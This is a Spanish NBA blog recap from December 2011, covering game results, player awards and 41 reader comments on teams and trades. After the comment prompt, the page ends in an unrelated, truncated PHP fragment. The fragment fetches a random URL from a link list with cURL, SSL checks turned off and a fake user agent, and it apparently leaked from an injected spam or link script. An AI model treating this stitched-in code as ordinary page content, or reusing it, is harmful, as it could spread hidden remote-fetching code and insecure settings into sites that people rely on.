La Crónica (28/12/2011)

29 de December de 2011 por TheDeerHunter

Jornada de escasas emociones. Curiosamente los que mayores problemas sufrieron fueron los dos favoritos de ambas conferencias, a domicilio en los dos casos.

Los Heat tuvieron que revertir un déficit de nada menos que 23 rebotes de diferencia ante Charlotte y un discreto partido de Wade. Diaw y DJ White causaban estragos en la zona de los subcampeones (el francés rozó el triple doble) y Henderson, Augustin y Kemba Walker generaban dolores de cabeza por fuera. Por desgracia para ellos cometieron el tipo de error que nunca se puede cometer contra Miami, que no es otro que perder balones. LeBron guisó ahí su cocido, Bosh y un espabilado Chalmers le ayudaron bien y aún dejaron la posibilidad abierta para que Wade resolviera el problema a 2’9 segundos del final en una jugada un tanto mal defendida por el propio Henderson (96-95). Por cierto, como curiosidad, vimos una canasta fantasma de LeBron. No os la perdáis.

Unos cuantos centenares de kilómetros más al oeste los Thunder también sudaron sangre para salir invictos de Memphis. Conley se lesionó a los 24 segundos pero el rookie Jeremy Pargo logró suplirle con solvencia. También ayudó la terrorífica actuación de Westbrook, que no fue capaz de dar una a derechas. Durant volvió a tener que vestirse de MVP para superar el buen partido del frontcourt local. Harden resultó un complemento determinante (98-95).

En el resto de choques no hubo tanta intriga. El más igualado fue el Indiana@Toronto en el que los Pacers doblegaron a los Raptors con sus propias armas, un excelente rendimiento colectivo destacando la pareja Granger-George (90-85). Los Hawks también mostraron un gran tono colectivo asfixiando a Washinton (83-101). Así fue también como los Spurs aplastaron a los Clippers, mostrándose como un bloque temible a pesar del gran partido de Griffin (90-115). A CP3 no le fue tan bien. Y ¿qué decir de los Denver Nuggets? Destrozaron a Utah dando una imagen sensacional (100-117). Nené estuvo descomunal y sólo les falta que Rudy empiece a jugar… Los Sixers también se mostraron como un gran bloque para machacar a Phoenix (103-83) y, en la sorpresa de la noche, los Hornets le endosaron el 0-3 a Boston (78-97). Falta Pierce, sí, pero en NOLA faltaba Eric Gordon.

Finalmente, grave decepción de Melo y sus Knicks en Oakland (78-92) y los Pistons volviendo por sus fueros para palmar en casa contra unos Cavs sobrados (105-97). Buen partido de Irving y sensacional de Samardo.

PREMIOS

MVP: 35 puntos, 6 rebotes, 7 asistencias, 3 robos y 2 tapones. Lebron James ha empezado más enchufado que nunca.

Rookie: En Detroit se enfrentaron 2 de los mejores bases de la nueva hornada. Salió vencedor a los puntos Brandon Knight con 23 puntos (10-13), 6 asistencias y 2 robos. Kyrie Irving se quedó en 14 puntos, 4 rebotes, 7 asistencias y 2 robos. En Memphis, Jeremy Pargo aprovechó la lesión de Michael Conley para jugar prácticamente todo el partido y anotar 15 puntos y repartir 7 asistencias. Alec Burks, de Utah, anotó 15 puntos en apenas 10 minutos.

Sorpresa: A Brandon Rush no le ha sentado nada mal el pase a los Warriors. 19 puntos, 6 rebotes, 2 asistencias, 2 tapones y 2 robos de balón.

Decepción: Día de exhibiciones en el tiro: Corey Maggette, 1-10, Andray Blatche, 2-13, y el más espectacular, Russell Westbrook, 0 de 13. Lo increíble es que los Thunder ganaran a pesar de semejante actuación.

Esfuerzo en vano: El máximo reboteador de la jornada fue un jugador de 2 metros y 3 centímetros, Boris Diaw. Cogió 16 rebotes que complementó con 8 asistencias y 16 puntos, rondando el triple doble. Lástima que Dwyane Wade no le permitiera saborear las mieles del triunfo.

Imágenes | AP Photos / Getty Images

Comenta

41 comentarios a esta entrada

  1. nach dice:
    #1

    Una duda me asalta: viendo la temporada pasada, los años que le quedan de contrato, su capacidad para pelarse todo lo que le cae en la mano aunque no enchufe una y el sueldo que cobra, no se podrían plantear los Grizzlies tradear a Gay?

    Contrato hasta 2015 de 15,16,18 y 19 kilos, el equipo funciona sin el (como se vio la temoprada anterior), y mejoraría el juego colectivo sin el en el campo. Un traspaso ahora para mí sería tremendamente beneficioso, porque está claro que pueden rascar algo interesante…

      Citar

  2. GreenPride dice:
    #2

    De ayer vi a ratos el Hornets-Celtics, Spurs-Clippers y Grizzlies-Thunder.
    En New Orleans, muy mal partido de unos Celtics que puede que ya estén dando sensaciones de que este calendario tan apretado les va a pasar factura. Sí, es cierto que dos de las 3 derrotas han sido en campos difíciles y sin Pierce y los 3 partidos fuera pero un contendiente al título debe poder sobreponerse a esas cosas. De momento, muchas dudas en los verdes a la espera de ver cómo van de aquí en adelante. Allen sí parece enchufado al igual que Rondo, pero Garnett no parece en buen estado y el equipo lo nota mucho. New Orleans tiene un equipo apañado con la gente que consiguió de los Clippers más Belinelli y algún jugador más que cumple. No serán equipo puntero pero tampoco de la cola.
    En San Antonio, los Spurs demostraron por segunda noche consecutiva que no van a vender su piel fácilmente esta temporada y si ayer ganaron a los Grizzlies, hoy metieron mano a otro de los aspirantes, los Clippers. Gran partido de Manudo y Parker que le ganó la partida a CP3. Por los Clips, partidazo insuficiente de Griffin pero sufrieron mucho para defender a un equipo que se las sabe todas como los Spurs. Todavía les falta acoplarse del todo para poder hacer frente a salidas difíciles como es El Alamo.
    En cuanto a los Thunder sudaron tinta para salir de Memphis con la victoria y aún así es una gran noticia ganar fuera de casa a un equipo de los buenos y con tu segunda estrella haciendo 0 de 13. Vaya partidito de Westbrook. Menos mal para Oklahoma que tienen varias opciones y Durantula y Harden se bastaron para acabar consiguiendo la victoria. Gran pinta la de los Thunder que parecen claramente el equipo del Oeste en este principio de temporada.
    Del resto, parece que los Heat no se pasearán tanto como parecía esta temporada. La zona y hacerles sufrir por dentro las claves. Y los Warriors, otro equipo muy peligroso si Curry y Ellis tienen el día, cuidado con ellos pues si cogen honda y no se lesionan ese equipo puede ser animador en su conferencia. De momento, victorias consecutivas ante dos equipos de los buenos como New York y Chicago.
    Por último, parece que Rudy no le coge el tono a ese otro animador del Oeste que son los Nuggets. Tal como están jugando sus compañeros más vale que coja rápido el ritmo si no quiere empezar a chupar banquillo. Los de Denver otro equipo interesante que dará más de un disgusto este año a sus oponentes

      Citar

  3. rojorob dice:
    #3

    17 puntos, 4 rebotes en 25 minutos. Parece que la porra ya tiene vencedor.

      Citar

  4. The wolf dice:
    #4

    Ayer vi unos pocos de partidos, me encanto el OKC – MEM con unos ositos mas que luchadores aunque para mi gusto si los thunders se hubieran puesto algo mas serios podrian haber finiquitado el partido antes del ultimo cuarto…por cierto es impresionante ver como Marc se pega “literalmente” por cada accion en la zona…una delicia verle.

    Por otro lado en el clippers – San antonio me encontre un toston de segunda mitad increible…con todo sentenciado y con ningun tipo de capacidad por parte de los clippers para tratar de remontar el asunto.

    Y por ultimo tenia ganas de ver al nuevo NOLA y no me defraudo para nada, al principio al ver que faltaba gordon presenti un paseo bostoniano, pero nada mas lejos de la realidad…con jack, landry, okafor, bellineli y alguno mas haciendo un partidazo que sin duda me dejo con muy buenas sensaciones y con ganas de volver a verlos pronto

      Citar

  5. CAMPO2 dice:
    #5

    Ayer vi el Indiana – Toronto y Calderon estuvo horroroso en el tiro y en perdidas de balon, Amir Johnson es nefasto, tiene manos blandas y falla canastas cantadas sin conocimiento, y Bargnani en defensa resta no es que sea un cero, es que el tio resta.

      Citar

  6. The wolf dice:
    #6

    A todo esto acabo de terminar de ver el knicks – GSW con el league pass y debo decir que a pesar de que ellis se lo tira todo y mete poco me ha encantado el partido de los warriors sin su base curry con un david lee decisivo en los momentos claves y con dos gratas sorpresas, un brandon rush que podria entrar en las quinielas del mejor sexto hombre y un Ish Smith del cual no tenia conocimiento y que me ha parecido un base rapido, con desparpajo y que ha hecho un par de robos curiosotes

      Citar

  7. melo15 dice:
    #7

    Os pido perdon por todas las veces que he dicho que los knicks son el mejor equipo, me he dado cuenta de que si no estan todos los titulares en pista no sabemos meter puntos.
    Y a todos los que criticasteis a mis rookies, miradlos: knight 23, irving 14 y 7, burks 10 en poco tiempo,kemba no lo se pero espero que lo haiga echo bien

      Citar

  8. Ru dice:
    #8

    Bueno,Rudy no parece que lo haya hecho mal,11 puntos y 8 asistencias,con buenos porcentajes.El segundo pasador del equipo por detrás de Andre Miller,eso sí,tiene pinta que su rol de tirador de 3 y nada de penetraciones sigue ahí.

    Por twitter se comenta que hubo discusión Westbrook – Durant en el banquillo,¿alguien vio algo?desconozco si se llegó a ver en televisión.De todas formas de ser cierto,pone de manifiesto la lucha de egos entre ellos dos,aunque supongo que lo correcto sería decir Westbrook frente a Durant.

      Citar

  9. The wolf dice:
    #9

    yo vi el partido y a no ser que ocurriese durante mis pausar para mear o beber agua (desgraciadamente a esas horas son muchas)….no vi nada de peleas ni nada de eso…pero vamos que no lo descartaria eh nunca me ha caido muy bien westbrook y en algunos detalles que tiene se le nota un tio extraño

      Citar

  10. jonybob dice:
    #10

    The wolf:
    A todo esto acabo de terminar de ver el knicks – GSW con el league pass y debo decir que a pesar de que ellis se lo tira todo y mete poco me ha encantado el partido de los warriors sin su base curry con un david lee decisivo en los momentos claves y con dos gratas sorpresas, un brandon rush que podria entrar en las quinielas del mejor sexto hombre y un Ish Smith del cual no tenia conocimiento y que me ha parecido un base rapido, con desparpajo y que ha hecho un par de robos curiosotes

    El último cuarto de Ellis fue espectacular con 12 puntos y 7 asist, y eso que ayer no le entraba nada en la pirmera parte ,de hecho no recuerdo una noche tan horrible en el tiro para él será que estuvo viendo la primera parte del OKC-Grizzlies

      Citar

  11. nach dice:
    #11

    En teoría además es agente libre restringido este verano no?

      Citar

  12. Jose Luis dice:
    #12

    -37 con Blake Griffin en pista, nada que comentar creo. A los Clippers se les va a jugar duro esta temporada, y Griffin va a sufrir cuando le defiendan bien, y más aún cuando tenga que defender. Hacía mucho tiempo que no veía un -37, y su equipo perdió por 25, que tampoco fue tanto tanto. El siguiente fue un -19 Mo Williams 18 puntos de diferencia.

      Citar

  13. The wolf dice:
    #13

    jonybob: El último cuarto de Ellis fue espectacular con 12 puntos y 7 asist, y eso que ayer no le entraba nada en la pirmera parte ,de hecho no recuerdo una noche tan horrible en el tiro para él será que estuvo viendo la primera parte del OKC-Grizzlies

    Yo me referia simplemente a que en el tiro me parece un tio que debe mejorar y mucho, pero vamos en general me gustaron muchisimo los warriors porque sin su base titular y con su lider en modo fallon sacaron adelante un partido contra un equipo apriori considerado uno de los mas fuertes de la liga…luego lo del ultimo cuarto de ellis pues si que fue decisivo la verdad

      Citar

  14. Esteban dice:
    #14

    Jose Luis:
    -37 con Blake Griffin en pista, nada que comentar creo. A los Clippers se les va a jugar duro esta temporada, y Griffin va a sufrir cuando le defiendan bien, y más aún cuando tenga que defender. Hacía mucho tiempo que no veía un -37, y su equipo perdió por 25, que tampoco fue tanto tanto. El siguiente fue un -19 Mo Williams 18 puntos de diferencia.

    por mas que la estadistica parezca muy clara, no hay que ser tan cerrado, griffin se comio todo el tercer cuarto en cancha, que fue el que perdieron por 20, y no fue su culpa

    es mas si vez, blair hizo un gran partido, pero tambien lo hicieron manu y parker, ahora griffin tamb defiende el perimetro?

    los clippers no tienen nada pero nada de banca para enfrentarse mano a mano contra equipos tan completos como estos spurs, o como lo era dallas el año pasado

    si de tus 6 mejores jugadores, 3 son bases, algo esta decididamente mal… ya deben traspasar a MO, por dos jugadores, que vengan de capa caida, pero que puedan ayudar mas desde el banco, esos casi 9 millones deberian ponerlos en posicion de traer dos jugadores de cierto nivel, y fichar a nate robinson con el espacio q tienen

      Citar

  15. Sancho88 dice:
    #15

    Rudy no hizo tan mal partido, dio 7 asistencias y 8 puntos, creo recordar. Sobre los Cavs, alguien dudaba del compromiso colectivo de Antawn Jamison… nada más lejos de la reaildad. Es el guía del equipo. Los raptors palmaron por tocarse las bolas defensivamente durante tres cuartos, aunque DeRozan, Calde y Bargnani casi le dan la vuelta en el último cuarto, OKLAHOMA ES EL FAVORITO AL TÍTULO, no veía un equipo tan sólido y dominante en el Oeste desde las dos primeras campañas de Pau en L.A., y sobre Detroit… no coments. ese equipo se va a la deriva y es imposible de rescatar. vaya banda!!

      Citar

  16. Sancho88 dice:
    #16

    Ru:
    Bueno,Rudy no parece que lo haya hecho mal,11 puntos y 8 asistencias,con buenos porcentajes.El segundo pasador del equipo por detrás de Andre Miller,eso sí,tiene pinta que su rol de tirador de 3 y nada de penetraciones sigue ahí.

    Por twitter se comenta que hubo discusión Westbrook – Durant en el banquillo,¿alguien vio algo?desconozco si se llegó a ver en televisión.De todas formas de ser cierto,pone de manifiesto la lucha de egos entre ellos dos,aunque supongo que lo correcto sería decir Westbrook frente a Durant.

    Como no fuera porque Durant le haya echado la bronca para que se ponga las pilas. LAMENTABLE COMIENZO DE TEMPORADA DE WESTBROOK

      Citar

  17. The wolf dice:
    #17

    Si denver juega muchos partidos como el de ayer va a ser un equipo muyyyy entretenido de ver…han comenzado muy bien la temporada y tienen un juego rapido y atractivo

      Citar

  18. Esteban dice:
    #18

    OKLAHOMA, se me hace que va a necesitar algun jugador mas, de sus 4 internos, ninguno puede anotar, mas este año que ibaka parece decidido a no hacerlo…

    weestbrook, ah arrancado mal con las perdidas, y si su suplente el maynor, no estan demasiado bien ahi tampoco

    obvio que durant y harden pueden suplir las deficiencias ofensivas del equipo, pero necesitara mas que 3 hombres capaces de anotar para lograr el titulo, es una pena que hayan hechado a nate, que podria haberles dado algo de chispa en ciertos momentos, o no ser tan ratones y quedarse con su contrato para un intercambio…

    por lo pronto veo a los suns no solo lejos de PO, sino cerca de la cima del draft…. eso quiza permita a GRANT HILL liberar su contrato para jugar para un aspirante… le vendria muy bien al thunder, un alero buen defensor, con experiencia y cierto poder de gol, podria ser el titular en lugar de sefolasha, eso si seria un salto de calidad…

      Citar

  19. melo15 dice:
    #19

    los thunder son los candidatos al titulo despues de Miami.
    Los knicks como ya he dicho fatal y eso que los warriors jugaban sin Curry, para mi los warriors son equipo de playoffs

      Citar

  20. nach dice:
    #20

    Aún queda mucho y va a haber sorpresas antes del trade dealine….

    Chicago se ha reforzado con mucha cabeza, ganando juego en estático con RIP, Oklahoma peca de falta de anotación interior, en un partido contra Miami no los veo superando un emparejamiento Durant-LeBron + Wade-Westbrook. No disponen de ese 3º anotador como puede ser Bosh para intentar desatascar los partidos, aunque su poderío defensivo interior debería permitirles frenarlo..

      Citar

  21. Esteban dice:
    #21

    seria mucho soñar, pero me gustaria nash con el balon en sus manos teniendo a durant como franco tirador a un costado, y jugando russel de escolta, lo que haria q no tenga la bola en sus manos los minutos finales de los partidos jeje

      Citar

  22. busky23 dice:
    #22

    No me ha gustado un pelo esa mini-discusión en el banquillo de los Thunder entre Durant y Westbrook. Este chico tiene tanta calidad como mala cabeza. Es obvio que entre él y Durant no hay muy buena relación y que su excesivo individualismo cabrea a mas de uno en la plantilla.
    Puede que sea arriesgado,pero no vería mal un traspaso con Westbrook de por medio,intentando conseguir un base que reparta y dirija y un hombre alto q ayude en la anotación a Durant y Harden.
    Este equipo ha de jugar por el anillo y elementos distorsionadores como Westbrook no creo que a largo plazo beneficien al equipo.

    PD: Hoy con Kidd enfrente disfrutará y hará numerazos de esos que a él tanto le gustan.

      Citar

  23. Jose Luis dice:
    #23

    Chicos, tengo una duda con el League Pass. Anoche estuve viendo los Raptors, Pistons, y quise ver Miami, pero no me dejaba, ¿alguien sabe por qué? ¿podré ver el Lakers-Knicks de esta noche por League Pass? porque si no es así, me da que no me quedo a verlo jajajaja

      Citar

  24. Sancho88 dice:
    #24

    El de Miami seguro que lo echaron en el plus, y por eso no lo podías ver. están restringidos en el league pass de España todos los partidos que de canal plus

      Citar

  25. melo15 dice:
    #25

    Cuando juegan los knicks
    Yo no venderia a westbrook ni en broma, yo intentaria que sentara un poco la cabeza y que aceptase su papel de secundari de lujo,pero no lo venderia nunca tiene un potencial tanto defensivo como ofensivo brutal

      Citar

  26. Sancho88 dice:
    #26

    En principio, esta noche no se podrá ver el Portland-Denver. Pero Lakers-Knicks, Nets-Magic, Spurs-Rockets, Mavericks-Thunder y Bulls-Kings sí están disponibles

      Citar

  27. Jose Luis dice:
    #27

    Melo, los Knicks juegan a las 4 30 de la mañana, y se puede ver en League Pass. Si lo vas a ver, podemos comentarlo por aqui jajaja. ¿Conseguiste el League Pass finalmente?

      Citar

  28. The wolf dice:
    #28

    otra opcion con el league pass si no sois trasnochadores es al dia siguiente acceder al league pass…ahi puedes ver el partido entero o cuartos sueltos sin saber el resultado del partido…eso hago yo cuando me dan las tantas y estoy arrastrandome ya

      Citar

  29. Ru dice:
    #29

    Yo no traspasaría a Westbrook a no ser que la cosa fuera insostenible,y dudo mucho que así sea,que ninguno es Kobe ni Shaq.Es más Durant,que hasta ahora nunca ha metido la pata de cara al público,siempre ha sido muy correcto y está alejado de cualquier estridencia,ya ha quitado hierro al asunto.

    Yo también creo que habrá sorpresas como dice nach en forma de traspaso,y todo en torno a Howard.

      Citar

  30. MagicJohnson32 dice:
    #30

    Juraría que la canasta ganadora de Wade son pasos bastante claros ¿no?

      Citar

  31. melo15 dice:
    #31

    Aver si lo puedo ver, y si me funciona lo vere por el ipad a ver que tal se ve

      Citar

  32. Kantonyo dice:
    #32

    MagicJohnson32:
    Juraría que la canasta ganadora de Wade son pasos bastante claros ¿no?

    Iba a comentar lo mismo que tu! A mi parecer son pasos claros, después de saltar tras pasos vuelve a pivotear antes de tirar. Gran partido de Bobcats con un prometedor Kemba Walker, vaya cambio de ritmo que tiene el condenado, alguien se acuerda de aquel canastom del año pasado

      Citar

  33. Kantonyo dice:
    #33

    http://www.youtube.com/watch?v=fKbLHkDvhk8

    La canasta de Walker contra Pitts en la final de la BigEast 2011

      Citar

  34. melo15 dice:
    #34

    Kemba walker es un dios, alguien sabe si es titular en los bobcats, lo digo por D.J augustin, porque yo el otro dia queria ver duelo de bases entre irving-knight, y va y el entrenador de los pistons pone a a stuckey de titular FLIPO
    Kantoyo, he estado leyendo articulos de años anteriores, y he visto que sabes mucho de la NCAA y eso, me podrias recomendar paginas, y webs para ver partidos o resumenes?

      Citar

  35. Sancho88 dice:
    #35

    Igual voy a decir una barbaridad, pero creo que James Harden está para ir a los juegos olímpicos. se acepta debate. Me encantaría verlo en el formato La Pregunta. Qué os parece?

      Citar

  36. MagicJohnson32 dice:
    #36

    Duraaaaant

      Citar

  37. Sancho88 dice:
    #37

    Rose-Durant-Lebron-Aldridge-Howard. De momento el quinteto de la temporada

      Citar

  38. Javijaen dice:
    #38

    Aunque llego un día tarde para comentar a mis Knicks, el partido contra GS fue terrible, sobre todo en el aspecto defensivo, ya que 11 rebotes ofensivos con Stoudemire-Melo-Chandler… pues son demasiados. Ellis hizo lo que quiso con Bibby o con Douglas, y cuando en ataque solo se me ocurre nombrar a Walker o Fields… Además muchos robos, y un pasotismo grave de Melo, hicieron que el equipo bajara muchos enteros. Golden State sin embargo, con una buena dirección de Ellis, un gran Rush y con Lee en forma, hicieron y deshicieron, sobre todo en la pintura. Para hacerselo mirar si quieren llegar a postemporada en los cuatro primeros puestos.

      Citar

  39. busky23 dice:
    #39

    Picadura mortal de Durantula… ES PEC TA CU LAR !!!!!

      Citar

  40. melo15 dice:
    #40

    Estoy deprimido, primero conta Golden State y ahora perdemos contra los Lakers, tenemos que hacer algo un jugador interior de repuesto, aunque hay que de decir que con davis y shumpert lesionados…

      Citar

  41. Tobal dice:
    #41

    Buen partido de los Bobcats,con un primer tiempo espectacular,en el que anotaron 60 puntos,lástima para ellos,del mal tercer cuarto,en el que se atascaron en ataque y perdieron muchos balones,lo que permitió contraataques de Lebron y compañia,pero Charlotte pese a no tener una estrella,le ví bien,teniendo en cuenta al equipo que había enfrente,destacar el partidazo de Boris Diaw con 16 puntos y 16 rebotes.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>